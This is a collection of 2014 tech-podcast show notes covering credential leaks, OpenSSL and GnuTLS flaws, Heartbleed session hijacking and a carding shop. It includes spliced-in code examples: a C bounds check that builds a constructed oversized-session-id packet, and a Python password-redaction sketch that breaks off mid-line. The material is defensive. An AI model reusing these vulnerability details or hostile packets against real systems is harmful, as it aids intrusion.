The report claims that around 1,000 Bank of America debit transactions on Apple Pay were mistakenly duplicated, seeing some people charged twice.


The problem was blamed on a processing error that occurred between the bank and at least one payments network, according to Bloomberg’s inside source, who added that the glitch is likely to be fixed today.

Chromebook shipments leap by 67 percent | ZDNet

ABI Research found that, in the most recent quarter, Chromebook shipments increased by 67 percent quarter over quarter. The research company expects that year over year, Chromebooks shipments will double.


Specifically, ABI found that Acer is continuing to maintain its lead over other vendors in the market, including Samsung, HP, and Dell. By ABI’s count, the top three leading vendors, Acer, Samsung, and HP, accounted for 74 percent of all Chromebooks shipped during the first half of 2014. ABI doesn’t see the top three changing in the waning months of 2014.


ABI also found that vertical markets — especially education — are a driving force. In emerging markets, especially in Asia-Pacific and Eastern Europe, business-purchasing entities account for 75 percent of Chromebook sales. Google is also making an enterprise push for Chromebooks with its Chromebooks for Work initiative.

PCWorld begins a weekly column on Linux and other non-Windows OSes.

https://www.pcworld.com/article/2825493/meet-world-beyond-windows-the-new-pcworld-column-dedicated-to-linux-chrome-os-and-anything-but-wind.html

The post Gmail isn't Gmail: it's gmail | Tech Talk Today 80 first appeared on Jupiter Broadcasting.

The New Payphone | Tech Talk Today 57 https://original.jupiterbroadcasting.net/66532/the-new-payphone-tech-talk-today-57/ Thu, 11 Sep 2014 09:36:21 +0000 https://original.jupiterbroadcasting.net/?p=66532 Gmail passwords may have been leaked, but there is some debate as to how bad the damage is. Google Voice gets rolled into Hangouts & we take a look at the results from “Internet Slowdown Day”. Plus our thoughts on mobile payments, a great deal for Linux users & more! Direct Download: MP3 Audio | […]


Gmail passwords may have been leaked, but there is some debate as to how bad the damage is. Google Voice gets rolled into Hangouts & we take a look at the results from “Internet Slowdown Day”.

Plus our thoughts on mobile payments, a great deal for Linux users & more!

Direct Download:

MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | Torrent Feed

Become a supporter on Patreon:


Show Notes:

5 Million Gmail Usernames and Passwords Leaked

In what appears to be an unknown attack, hackers dumped over 5,000,000 valid Gmail usernames and passwords on the Internet early Wednesday morning.

Unknown hackers have leaked over five million valid credentials pertaining to Google Mail logins early this morning. The random dump of passwords first appeared on reddit’s netsec section, linking to another website hosting the leaked Gmail accounts.

The .txt file of all leaked Gmail usernames was found on BitCoin security (a forum in Russian), where the leak is believed to have first been offloaded. The file of leaked emails does not contain any passwords or other sensitive information, only full Gmail email addresses.

As the leak was posted only hours ago, Reddit users are warning each other not to enter any email username or password combinations into any websites “to check if your password is secure.” It appears scams are already appearing or Reddit users are getting ready for the scams to come.

“The security of our users’ information is a top priority for us,” a Google spokesperson told TNW. “We have no evidence that our systems have been compromised, but whenever we become aware that accounts may have been, we take steps to help those users secure their accounts.”

Next, since the posting, the forum administrators have purged the passwords from the text file in question, leaving only the logins. Furthermore, tvskit, the forum user who published the file, claimed that some 60 percent of the passwords were valid.

Google Voice Integration Is Currently Rolling Out In Hangouts

Google Voice is finally being integrated into Hangouts, because God knows Hangouts needed to be even more confusing. You can enable Voice SMS and voicemail via a popup in the conversation list, so check the app. If you still don’t see it, hang on. It’s still rolling out.

“Internet Slowdown Day” sends over 111,000* new comments on net neutrality to FCC

The effort appears to have made a difference: According to the FCC*, by 6 PM ET the agency saw 111,449 new public comments added to the already record-setting total, with some 41,173 filed into the 14-28 docket of the FCC’s website since and another 70,286 sent to the openinternet@fcc.gov inbox, setting a new high water mark of some 1,515,144 to date, with more yet to come. As reported by Mike Masnick, citing ThinkProgress, the Internet slowdown generated 1000 calls per minute to Congress. *Update: Fight for the Future claims that more than 500,000 comments have been submitted through Battleforthenet.com and that the FCC hasn’t caught up. According to the nonprofit, “this happened during our last big push too when their site crashed. We are storing comments and will deliver all.”

IDG shutters Macworld Magazine, much of the editorial staff let go | 9to5Mac

International Data Group (IDG) is shutting down Macworld Magazine, the long time Apple periodical according to tweets by staff and conversations I’ve had with personnel.

The Macworld.com website will remain open [although as a shell of its former self -ed] with a reduced staff according to Dan Miller (editor), who himself is leaving in a month.

Why pay with your phone? : techtalktoday

Floppy-Bacon Writes

Is payment in stores in the US really as bad as Apple’s presentation made it look? When I pay with my debit card (or credit card), I don’t hand it to the cashier. I insert it into a small device and enter my 4-digit PIN code; fast and secure. I do not need to identify myself, I do not give any detail about my card and I do not have 15 cards in my wallet or however many cards she had in the video. I know that I hate technology, but do you really want to pay with your phone rather than just fix the payment system to how it works elsewhere? For the time being you still need to have your wallet with you for all the other stuff. (And taking my phone with me will just be extra cumbersome.)

Crossover Linux 50% off : linux_gaming

I received an e-mail this morning from CodeWeavers that CrossOver Linux + 12 months of support is 50% off for the next 48 hours.

Promotional Code: FLASHME

For more information: https://www.codeweavers.com/products/crossover-linux

The post The New Payphone | Tech Talk Today 57 first appeared on Jupiter Broadcasting.

Big Brother Google | Tech Talk Today 37 https://original.jupiterbroadcasting.net/63757/big-brother-google-tech-talk-today-37/ Mon, 04 Aug 2014 09:30:27 +0000 https://original.jupiterbroadcasting.net/?p=63757 Google says “think of the children” but does that justify fully analyzing the contents of everyone’s Gmail? A drone crashes carrying phones and drugs into a prison & “The Scourge Of Zero Rating”. Direct Download: MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube RSS Feeds: MP3 Feed | OGG […]


Google says “think of the children” but does that justify fully analyzing the contents of everyone’s Gmail? A drone crashes carrying phones and drugs into a prison & “The Scourge Of Zero Rating”.

Direct Download:

MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | Torrent Feed

Become a supporter on Patreon:


Show Notes:

Crashed drone carried contraband aimed at South Carolina prison | Reuters

A drone being flown in a novel attempt to smuggle phones, marijuana and tobacco into a South Carolina maximum security prison crashed outside its walls, authorities said on Wednesday.

Officials believe it was the first time an unmanned aircraft had been used in an effort to breach prison walls in the state, Givens said. Most cellphones are thrown over walls.

Authorities have arrested one man in the drone incident and are seeking another suspect. Brenton Lee Doyle, 28, appeared in court on Wednesday for a hearing. He faces charges of attempting to introduce contraband into a prison and possession of the drug flunitrazepam, a muscle relaxant known as “roofies.”

Doyle has said he has never seen a drone and that police said nothing about a drone at the time of his arrest, his attorney Wayne Floyd said.

Police Say A Google Tip About Child Abuse Led To Arrest – Business Insider

A Houston man has been arrested after Google sent a tip to the National Center for Missing and Exploited Children saying the man had explicit images of a child in his email, according to Houston police.

The man was a registered sex offender, convicted of sexually assaulting a child in 1994, reports Tim Wetzel at KHOU Channel 11 News in Houston.

“He was keeping it inside of his email. I can’t see that information, I can’t see that photo, but Google can,” Detective David Nettles of the Houston Metro Internet Crimes Against Children Taskforce told Channel 11.

After Google reportedly tipped off the National Center for Missing and Exploited Children, the center alerted police, who used the information to get a warrant.

On one hand, most people would certainly applaud the use of technology to scan email in a case like this.

On the other, debate rages about how much privacy users can expect when using Google’s services like email. In a word: none.

A year ago, in a court brief, Google said as much. Then, in April, after a class-action case against Google for email scanning fell apart, Google updated its terms of service to warn people that it was automatically analyzing emails.

Google Said to Plan Separating Photo Service From Google+ – Bloomberg

The move would enable the photo service to stand more independently and be accessible for consumers who aren’t part of Google+, potentially spurring more growth, said the people, who asked not to be identified because the plans aren’t public. The service, called Google+ Photos, would still work with the social network’s users and may be rebranded as part of the move, one of the people said.

Mailpile: Mailpile Alpha II – The Dogfood Edition

We present Mailpile Alpha II – The Dogfood Edition!

Yummy! This savoury mass of source code has been tagged in Github (release 0.2.0) and we have updated our live demos.

The Scourge Of Zero Rating – AVC

Fred Wilson is a New York City-based venture capitalist since 1986, and a blogger. Wilson is the co-founder of Union Square Ventures, with investments in companies such as Twitter, Tumblr, Foursquare, Zynga, Kickstarter, and others.

It seems like every week I read another article about a mobile carrier offering some incredible deal to eat the mobile data costs you rack up using certain apps.

The most recent was the news that Sprint will sell a data plan that “only connects to Facebook and Twitter”.

The pernicious thing about zero rating is that it is marketed as a consumer friendly offering by the mobile carrier — “we are not charging you for data when you are on Spotify”.


But what all of this zero rating activity is setting up is a mobile internet that looks a lot more like cable TV than our wide open Internet. Soon a startup will have to negotiate a zero rating plan before launching because mobile app customers will be trained to only use apps that are zero rated on their network.

I strongly encourage policy makers, policy wonks, internet activists, and anyone who cares about protecting an open internet for all to take a hard look at zero rating. Like all the best scourges, it’s a wolf in sheep’s clothing.

The post Big Brother Google | Tech Talk Today 37 first appeared on Jupiter Broadcasting.

House of Credit Cards | TechSNAP 165 https://original.jupiterbroadcasting.net/59167/house-of-credit-cards-techsnap-165/ Thu, 05 Jun 2014 17:31:21 +0000 https://original.jupiterbroadcasting.net/?p=59167 Just when you thought openSSL was safe, we’ve got a whole new round of security flaws. Plus we’ll go inside a massive online carding shop. Then it’s your questions, our answers, and much much more! Thanks to: Direct Download: HD Video | Mobile Video | MP3 Audio | Ogg Audio | YouTube | HD Torrent […]


Just when you thought openSSL was safe, we’ve got a whole new round of security flaws. Plus we’ll go inside a massive online carding shop.

Then it’s your questions, our answers, and much much more!

Thanks to:


DigitalOcean | Ting | iXsystems

Direct Download:

HD Video | Mobile Video | MP3 Audio | Ogg Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feeds | Torrent Feed

— Show Notes: —

OpenSSL and GnuTLS flaws

  • A series of new vulnerabilities has been found in both SSL/TLS libraries
  • Latest versions:
    • OpenSSL 0.9.8za
    • OpenSSL 1.0.0m
    • OpenSSL 1.0.1h
  • CVE-2014-0224 — An attacker using a carefully crafted handshake can force the use of weak keying material in OpenSSL SSL/TLS clients and servers. This can be exploited by a Man-in-the-middle (MITM) attack where the attacker can decrypt and modify traffic from the attacked client and server. The attack can only be performed between a vulnerable client and server. OpenSSL clients are vulnerable in all versions of OpenSSL. Servers are only known to be vulnerable in OpenSSL 1.0.1 and 1.0.2-beta1. Users of OpenSSL servers earlier than 1.0.1 are advised to upgrade as a precaution.
  • CVE-2014-0221 — By sending an invalid DTLS handshake to an OpenSSL DTLS client the code can be made to recurse eventually crashing in a DoS attack. Only applications using OpenSSL as a DTLS client are affected.
  • CVE-2014-0195 — A buffer overrun attack can be triggered by sending invalid DTLS fragments to an OpenSSL DTLS client or server. This is potentially exploitable to run arbitrary code on a vulnerable client or server. Only applications using OpenSSL as a DTLS client or server are affected.
  • CVE-2014-0198 — A flaw in the do_ssl3_write function can allow remote attackers to cause a denial of service via a NULL pointer dereference. This flaw only affects OpenSSL 1.0.0 and 1.0.1 where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the default and not common.
  • CVE-2010-5298 — A race condition in the ssl3_read_bytes function can allow remote attackers to inject data across sessions or cause a denial of service. This flaw only affects multithreaded applications using OpenSSL 1.0.0 and 1.0.1, where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the default and not common.
  • CVE-2014-3470 — OpenSSL TLS clients enabling anonymous ECDH ciphersuites are subject to a denial of service attack.
  • OpenSSL 1.0.0m and OpenSSL 0.9.8za also contain a fix for CVE-2014-0076: Fix for the attack described in the paper “Recovering OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack”. This issue was previously fixed in OpenSSL 1.0.1g.
  • GnuTLS releases update to fix flaws as well
  • CVE-2014-3466 — A flaw was found in the way GnuTLS parsed session ids from Server Hello packets of the TLS/SSL handshake. A malicious server could use this flaw to send an excessively long session id value and trigger a buffer overflow in a connecting TLS/SSL client using GnuTLS, causing it to crash or, possibly, execute arbitrary code. The flaw is in read_server_hello() / _gnutls_read_server_hello(), where session_id_len is checked to not exceed incoming packet size, but not checked to ensure it does not exceed maximum session id length.
  • Deeper analysis of the GnuTLS flaw
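An added example, not GnuTLS code, of the two bounds checks the CVE-2014-3466 description calls for: the announced session id length must fit the packet and the 32-byte protocol maximum, and the weaker check alone lets an oversized id through. The field layout (version, 32-byte random, one-byte length, id) and all sample bytes are constructed for this example.

```c
/* Added example (not GnuTLS code): the two bounds checks a ServerHello
 * session-id parser needs, per the CVE-2014-3466 description above.
 * Assumed layout: version(2) | random(32) | session_id_len(1) | session_id. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TLS_MAX_SESSION_ID_LEN 32   /* TLS SessionID is 0..32 bytes */
#define SID_OFFSET (2 + 32)         /* version + random precede the length byte */

typedef struct {
    uint8_t id[TLS_MAX_SESSION_ID_LEN]; /* fixed-size destination, as in a client */
    size_t len;
} session_id_t;

/* The incomplete check from the show notes: only asks whether the announced
 * length fits inside the packet. A 200-byte id in a packet that really does
 * carry 200 bytes passes, yet would overflow the 32-byte destination. */
int sid_len_fits_packet(size_t sid_len, size_t pkt_len)
{
    return SID_OFFSET + 1 + sid_len <= pkt_len;
}

/* The complete check: the length must fit the packet AND the protocol
 * maximum, which is also the size of the destination buffer. */
int sid_len_valid(size_t sid_len, size_t pkt_len)
{
    return sid_len <= TLS_MAX_SESSION_ID_LEN && sid_len_fits_packet(sid_len, pkt_len);
}

/* Copy the session id out of a ServerHello body into out.
 * Returns 0 on success, -1 if the packet is truncated or the length is out of range. */
int parse_server_hello_session_id(const uint8_t *pkt, size_t pkt_len, session_id_t *out)
{
    if (pkt_len < SID_OFFSET + 1)
        return -1;                            /* length byte not present */
    size_t sid_len = pkt[SID_OFFSET];
    if (!sid_len_valid(sid_len, pkt_len))
        return -1;                            /* oversized or truncated */
    memcpy(out->id, pkt + SID_OFFSET + 1, sid_len);
    out->len = sid_len;
    return 0;
}

/* Build a constructed ServerHello body announcing sid_len bytes of session id
 * (sid_len above 32 models a malicious server). Returns bytes written, 0 if
 * buf is too small. */
size_t build_server_hello(uint8_t *buf, size_t buf_size, size_t sid_len)
{
    if (sid_len > 255 || buf_size < SID_OFFSET + 1 + sid_len)
        return 0;
    buf[0] = 0x03; buf[1] = 0x03;             /* TLS 1.2 version bytes */
    memset(buf + 2, 0xAA, 32);                /* constructed "random" */
    buf[SID_OFFSET] = (uint8_t)sid_len;
    memset(buf + SID_OFFSET + 1, 0x5A, sid_len);
    return SID_OFFSET + 1 + sid_len;
}

/* Build a packet with sid_len bytes of id, drop truncate_by bytes from its
 * end, and return the parser's verdict (0 accepted, -1 rejected). */
int parse_constructed(size_t sid_len, size_t truncate_by)
{
    uint8_t pkt[512];
    session_id_t sid;
    size_t n = build_server_hello(pkt, sizeof pkt, sid_len);
    if (n == 0 || truncate_by > n)
        return -1;
    return parse_server_hello_session_id(pkt, n - truncate_by, &sid);
}

int main(void)
{
    printf("benign 16-byte id:            %d\n", parse_constructed(16, 0));
    printf("hostile 200-byte id:          %d (fits packet=%d, valid=%d)\n",
           parse_constructed(200, 0), sid_len_fits_packet(200, 235), sid_len_valid(200, 235));
    printf("16-byte id, packet truncated: %d\n", parse_constructed(16, 4));
    return 0;
}
```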

Inside a carding shop

  • Brian Krebs releases his exposé on the inner workings of a professional carding shop
  • This shop focused on ‘dumps’, full track data that can be written to blank cards, allowing the fraudster to take the card into a big box store, and buy large ticket items that can easily be sold for cash
  • “The subject of this post is “McDumpals,” a leading dumps shop that first went online in late April 2013. “
  • “Like many other dumps shops, McDumpals recently began requiring potential new customers to pay a deposit (~$100) via Bitcoin before being allowed to view the goods for sale. Also typical of most card shops, this store’s home page features the latest news about new batches of stolen cards that have just been added, as well as price reductions on older batches of cards that are less reliable as instruments of fraud.”
  • Brian has a great slideshow that shows some of the regions and retailers that were compromised, and what the sets of cards sell for

Feedback:


Round Up:


The post House of Credit Cards | TechSNAP 165 first appeared on Jupiter Broadcasting.

Getting a Handoff | Tech Talk Today 4 https://original.jupiterbroadcasting.net/59052/getting-a-handoff-tech-talk-today-4/ Thu, 05 Jun 2014 10:57:11 +0000 https://original.jupiterbroadcasting.net/?p=59052 The tech headlines of the day, like Intel’s fully wireless PC, Sprint buying T-Mobile, and Reset the Net. Then we’ll look at the convergence strategies of Apple, Microsoft, and Canonical and debate if Apple nailed the most practical implementation at this year’s WWDC. Plus feedback, follow up, and more! Direct Download: MP3 Audio | OGG […]


The tech headlines of the day, like Intel’s fully wireless PC, Sprint buying T-Mobile, and Reset the Net.

Then we’ll look at the convergence strategies of Apple, Microsoft, and Canonical and debate if Apple nailed the most practical implementation at this year’s WWDC.

Plus feedback, follow up, and more!

Direct Download:

MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | iTunes Feed | Video Feed | Torrent Feed

Become a Tech Talk Today supporter on Patreon:


Show Notes:

Headlines

Reset the Net

First, get hundreds of sites & apps to add proven security (like SSL).

Then on June 5, we’ll run a splash screen everywhere to spread NSA-resistant privacy tools.

Comcast plans to encrypt email exchanged with Google’s Gmail | PCWorld

Comcast plans to work with Google to encrypt email exchanged between its own servers and Gmail, a Comcast spokesman said on Tuesday night.

Comcast supports Transport Layer Service encryption for email messages, and Comcast employees “plan to ramp up with Gmail in next few weeks,” a Comcast spokesman said via a Twitter message. More details will be revealed at the Messaging, Malware and Mobile Anti-Abuse Working Group meeting next week, he said, which will be held in Brussels. Comcast is a meeting sponsor.

UPDATE 3-Sprint agrees to pay about $40/shr to buy T-Mobile -source | Reuters

Sprint Corp has agreed to pay about $40 per share to buy T-Mobile US Inc, a person familiar with the matter told Reuters on Wednesday, signalling progress in a long-contemplated deal to merge the third- and fourth-largest U.S. wireless carriers.

At that price, about a 17 percent premium to the carrier’s Wednesday close, T-Mobile would be worth more than $32 billion.

Deutsche Telekom owns 67 percent of T-Mobile and is expected to keep a 15 to 20 percent stake of the combined company as part of the deal, the source said on condition of anonymity because the discussions were private.

Intel aims to eliminate all PC cables in 2016 – CNET

On stage at the Computex, Intel’s Kirk Skaugen, senior vice president and general manager of the PC Client Group, demonstrated wireless display, docking and charging features that will close the loop on the final few mandatory cables in the typical PC environment.

The high-speed WiGig standard will be used as the short range “docking” technology, instantly creating a connection to a screen and peripherals when a device is moved within range and then swapping back out to standalone usage by just picking up and walking away. WiGig delivers speeds of up to 7Gbps.

For power, Skaugen demonstrated Rezence, the magnetic resonance charging technology, promoted by the Alliance 4 Wireless Power (A4WP), that Intel is aligned with. The system can be installed under a table surface, with magnetic resonance capable of charging through 2 inches of wood.

With Skylake expected second half of 2015 it’s likely devices based on Intel’s reference designs would start to hit the market in 2016.

Microsoft: Software update unlocks more GPU bandwidth on Xbox One | Ars Technica

Microsoft says the new firmware will also help developers extract more power from the system’s Graphical Processing Unit (GPU), even though the base hardware in the system is obviously staying the same.

“In June we’re releasing a new SDK making it possible for developers to access additional GPU resources previously reserved for Kinect and system functions,” a Microsoft spokesperson told Ars today. “The additional resources allow access to up to 10 percent additional GPU performance. We’re committed to giving developers new tools and flexibility to make their Xbox One games even better by giving them the option to use the GPU reserve in whatever way is best for them and their games.”

Did Apple Nail Convergence?

NSA-Mocking Easter Egg Found In Google’s New Email Encryption Plug-In

However, Google left a little easter egg in the code that is more than funny.

Feedback:

T3 lands in iTunes: iTunes – Podcasts – Tech Talk Today MP3

Unfilter Shirt: Unfilter Episode 100 Shirt! | Teespring


The post Getting a Handoff | Tech Talk Today 4 first appeared on Jupiter Broadcasting.

Netflix Bites the Bully | Tech Talk Today 3 https://original.jupiterbroadcasting.net/58977/netflix-bites-the-bully-tech-talk-today-3/ Wed, 04 Jun 2014 10:11:34 +0000 https://original.jupiterbroadcasting.net/?p=58977 Netflix is naming and shaming ISPs right on the buffering screen of your movie and Verizon is not happy about it. Plus Amazon is putting the hurt on book publishers, leveraging its growing monopoly and why despite our better judgment, we can’t help but live Prime. Direct Download: MP3 Audio | OGG Audio | Video […]


Netflix is naming and shaming ISPs right on the buffering screen of your movie and Verizon is not happy about it.

Plus Amazon is putting the hurt on book publishers, leveraging its growing monopoly and why despite our better judgment, we can’t help but live Prime.

Direct Download:

MP3 Audio | OGG Audio | Video | HD Video | Torrent | YouTube

RSS Feeds:

MP3 Feed | OGG Feed | Video Feed | Torrent Feed

Become a Tech Talk Today supporter on Patreon:


Show Notes:

Headlines

Valve shows off updated VR headset prototype with Dota 2 demo

Valve’s prototype unit looks a lot like Oculus’ recently demoed Crystal Cove test unit. It’s a black wrap-around device covered with white IR-reflective dots. A separate camera uses those dots to keep tabs on how the wearer is moving his or her head. This allows for much more accurate motion tracking and a better immersive experience than simply using accelerometers and gyroscopes in the device itself. The last prototype, which was demoed in a very limited fashion, used QR codes and a camera attached to the visor to improve tracking.

Safer email – Transparency Report – Google

Gmail has always supported encryption in transit by using Transport Layer Security (TLS), and will automatically encrypt your incoming and outgoing emails if it can. The important thing is that both sides of an email exchange need to support encryption for it to work; Gmail can’t do it alone.

Our data show that approximately 40 to 50 percent of emails sent between Gmail and other email providers aren’t encrypted.

ProtonMail was founded in summer 2013 at CERN by scientists who were drawn together by a shared vision of a more secure and private Internet. Early ProtonMail hackathons were held at the famous CERN Restaurant One. ProtonMail is developed both at CERN and MIT and is headquartered in Geneva, Switzerland.

Intel Reaches 5GHz with New Core I7 Chip for Gamers

Intel is shipping a new Core i7 chip for gamers that runs at 4.4GHz — and can be overclocked to 5GHz.

The Core i7-4790K is a quad-core chip based on the Haswell microarchitecture. It draws 88 watts of power and has 8MB of cache, integrated graphics, memory controllers and support for the latest I/O technologies. It also supports multithreading and allows cores to process two tasks at one time.

Netflix Blames Verizon for Slow Streams

In April, Netflix signed a Web traffic deal with Verizon. Now it is telling some of its customers that Verizon’s pipes — and, presumably, other ISPs’ as well — aren’t up to snuff.

Amazon

Amazon/Hachette dispute unlikely to provoke regulators, experts say

Amazon has delayed the delivery of some Hachette Book Group titles and even removed an option to pre-order “The Silkworm,” by Harry Potter author J.K. Rowling writing as Robert Galbraith. Hachette, the fourth largest U.S. book publisher, is owned by France’s Lagardère SCA.

By some estimates, today Amazon controls around 50 percent of all book sales—physical and electronic—in the U.S. In the past decade, the company has steadily grown that market share, taking it from Barnes & Noble (shrinking), Borders (bankrupt since 2011), and independent bookstores (around 2,000 remain today out of the nearly 7,000 there were in the mid-1990s).

Amazon CEO wins World’s Worst Boss

Amazon CEO Jeff Bezos is the world’s worst boss, according to the International Trade Union Confederation (ITUC).

More than 20,000 voted for nine bosses who exemplified the worst behavior and abuses in workers’ rights, tax avoidance, and corporate bullying and other abuses.

Bezos resoundingly won.

“Jeff Bezos represents the inhumanity of employers who are promoting the American corporate model. The message to big business is back off, you are not going to mistreat workers,” said Burrow.

Amazon Robotics Kiva Systems

Amazon currently uses some 1,000 robots by Kiva Systems, a company it bought for $775 million in 2012, to fill its customers’ orders. Now CNN reports that Amazon will have 10,000 robots doing the same by the end of this year.

CEO Jeff Bezos revealed the plan to double down on robotics during a shareholder meeting and emphasized that despite the popular sci-fi theme of robotic uprising, no humans will lose their jobs as a result of the increased robotic workforce.

A Day in the Life of a Kiva Robot

Kiva Systems founder and CEO Mick Mountz narrates a play-by-play video of how Kiva robots automate a warehouse environment.

The Everything Store: Jeff Bezos and the Age of Amazon Audiobook

Amazon.com started off delivering books through the mail. But its visionary founder, Jeff Bezos, wasn’t content with being a bookseller. He wanted Amazon to become the everything store, offering limitless selection and seductive convenience at disruptively low prices. To do so, he developed a corporate culture of relentless ambition and secrecy that’s never been cracked. Until now.


The post Netflix Bites the Bully | Tech Talk Today 3 first appeared on Jupiter Broadcasting.

Heartbleed Fallout | TechSNAP 160 https://original.jupiterbroadcasting.net/56502/heartbleed-fallout-techsnap-160/ Thu, 01 May 2014 19:00:17 +0000 https://original.jupiterbroadcasting.net/?p=56502 OpenBSD launches LibreSSL, but what challenges do they face? And how much progress have they made? We’ll report! Apple is struck with its own woes, Heartbleed is used to bypass two-factor authentication, and then it’s a great batch of your questions and our answers! On this week’s episode of TechSNAP! Thanks to: Direct Download: HD […]


OpenBSD launches LibreSSL, but what challenges do they face? And how much progress have they made? We’ll report!

Apple is struck with its own woes, Heartbleed is used to bypass two-factor authentication, and then it’s a great batch of your questions and our answers!

On this week’s episode of TechSNAP!

Thanks to:


DigitalOcean | Ting | iXsystems

Direct Download:

HD Video | Mobile Video | MP3 Audio | Ogg Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feeds | Torrent Feed

— Show Notes: —

OpenBSD launches LibreSSL

  • The team behind OpenBSD has formalized their fork of OpenSSL and called it LibreSSL
  • The goal is to update the coding standards, to use more modern and safer C programming practices
  • The impetus for this was in fact not Heartbleed, but the mitigation countermeasures discovered by OpenBSD developers before Heartbleed was found
  • The way much of OpenSSL is constructed makes it harder to audit with tools like Coverity and Valgrind, and the lack of consistent style, naming, etc., makes it exceptionally hard to audit by hand
  • There were many bugs in the OpenSSL bug tracker that had been open for as much as 4 years and never addressed
  • Bob Beck of the OpenBSD project says that most of the actual crypto code in OpenSSL is very good, as it was written by cryptographers, but a lot of the plumbing is very old and needs serious updating
  • Part of the 90,000 lines of code removed in LibreSSL was the FIPS compliance module, which has not been maintained for nearly 20 years
  • So far, all of the changes have been API compatible, so any application that can use OpenSSL can still use LibreSSL
  • The OpenBSD Foundation is soliciting donations to continue the work on LibreSSL and develop a portable version for other operating systems
  • LibreSSL site, complete with working tag

Apple fixes major SSL flaw that could have allowed an attacker to intercept data over an encrypted connection, or inject their own data into the connection

  • Apple has fixed a serious security flaw that’s present in many versions of both iOS and OSX and could allow an attacker to intercept data on SSL connections. The bug is one of many that the company fixed Tuesday
  • “In a ‘triple handshake’ attack, it was possible for an attacker to establish two connections which had the same encryption keys and handshake, insert the attacker’s data in one connection, and renegotiate so that the connections may be forwarded to each other,” the Apple
  • The vulnerability affects OS X Mountain Lion 10.8.5, OS X Mavericks 10.9.2, as well as iOS 7.1 and earlier. The bug joins a list of serious problems that have affected SSL in recent months, most notably the OpenSSL heartbleed vulnerability disclosed earlier this month.
  • OSX also contains two separate vulnerabilities that could enable an attacker to bypass ASLR, one of the key exploit mitigations built into the operating system. One of the flaws is in the IOKit kernel while the other is in the OSX kernel. The IOKit kernel ASLR bypass also affects iOS 7.1 users.
  • Among the other flaws Apple patched in its new releases are a number other severe vulnerabilities. For OSX Mavericks users, the two most concerning issues are a pair of buffer overflows that could lead to remote code execution. One of the bugs is in the font parser and the second is in the imageIO component. The upshot of the vulnerabilities is that opening a malicious PDF or JPEG could lead to arbitrary code execution.

Heartbleed used to defeat 2 factor authentication

  • Security nightmares sparked by the Heartbleed OpenSSL vulnerability continue, according to Mandiant (now a unit of FireEye):
  • An attacker was able to leverage the Heartbleed vulnerability against the VPN appliance of a customer and hijack multiple active user sessions.
  • The attack bypassed both the organization’s multifactor authentication and the VPN client software used to validate that systems connecting to the VPN were owned by the organization and running specific security software.
  • “Specifically, the attacker repeatedly sent malformed heartbeat requests to the HTTPS web server running on the VPN device, which was compiled with a vulnerable version of OpenSSL, to obtain active session tokens for currently authenticated users,” Mandiant’s Christopher Glyer explained.
  • With an active session token, the attacker successfully hijacked multiple active user sessions and convinced the VPN concentrator that he/she was legitimately authenticated.
  • After connecting to the VPN, the attacker attempted to move laterally and escalate his/her privileges within the victim organization, Mandiant said.
  • Additional Coverage

Feedback:


Round Up:

HP’s Backdoor | TechSNAP 116
https://original.jupiterbroadcasting.net/39602/hps-backdoor-techsnap-116/
Thu, 27 Jun 2013 19:36:49 +0000


Opera’s code signing certificate gets compromised, resulting in malware being pushed out via their automatic update system.

Plus the backdoor that ships in some high-end HP products, your questions, and much much more.

On this week’s TechSNAP!


Opera code signing certificate compromised

  • On June 19th Opera uncovered, halted and contained a targeted attack on their internal network infrastructure.
  • There is no evidence of any user data being compromised.
  • The attackers were able to obtain at least one old and expired Opera code signing certificate, which they have used to sign some malware.
  • This has allowed them to distribute malicious software which incorrectly appears to have been published by Opera Software, or appears to be the Opera browser.
  • It is possible that a few thousand Windows users, who were using Opera between 01.00 and 01.36 UTC on June 19th, may automatically have received and installed the malicious software.

How much is your gmail account worth?

  • University of Illinois at Chicago has developed ‘CloudSweeper’
  • Connects to your Gmail account via OAuth and scans all of your email
  • Finds which accounts you have connected to your gmail
  • If an attacker were to compromise your gmail account, they could reset the passwords for and gain control over all of these accounts
  • The service uses an index of the value of these accounts from various underground forums
  • Tells you how much your gmail account would be worth to an attacker
  • Finds services such as: Amazon, Apple, Groupon, Hulu, Newegg, Paypal, Skype, UPlay and Yahoo
  • Optionally, it can also scan your email for plain text passwords in emails
  • If found, CloudSweeper can connect to Gmail via IMAP and edit these emails, either removing the password entirely (redacting) or encrypting it (replacing it with an encrypted string), and then provides you with a decryption key (a long string of text, or a QR code for simplicity)
  • If you ever need to decrypt the password, you return to CloudSweeper and scan the QR code
  • Krebs on Naming and Shaming Plain Text Passwords
  • PlainTextOffenders.com
  • PasswordFail.com – Browser extension to warn you before you sign up
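As an added illustration of the redact-or-encrypt step described above (this is not CloudSweeper’s code; its real regexes and cipher are not on this page), the following Python runs the same idea over a constructed sample message: a heuristic regex finds lines that disclose a password, and each hit is either redacted or replaced with an ENC[...] token encrypted under one master key that is handed back to the user. The regex, the token format, the HMAC-SHA256 counter-mode cipher and the encrypt-then-MAC layout are this example’s own choices, and DEMO_KEY is a fixed key used only so the output is reproducible. The IMAP write-back (APPEND the rewritten copy, then flag the original \Deleted) is left as a comment so the example runs offline.

```python
from __future__ import annotations

import base64
import email
import hashlib
import hmac
import re
import secrets
from email import policy
from email.message import EmailMessage

# Constructed sample message (not real mail): a "welcome" e-mail that echoes the
# new account's password back to the user in clear text.
SAMPLE_RAW = b"""From: noreply@shop.example
To: alice@example.com
Subject: Welcome to ExampleShop
Content-Type: text/plain; charset="utf-8"

Hi Alice,

Your account is ready.
Username: alice@example.com
Your password is: Tr0ub4dor&3

Thanks for shopping with us.
"""

# Fixed key so the example is reproducible. A real tool generates a fresh
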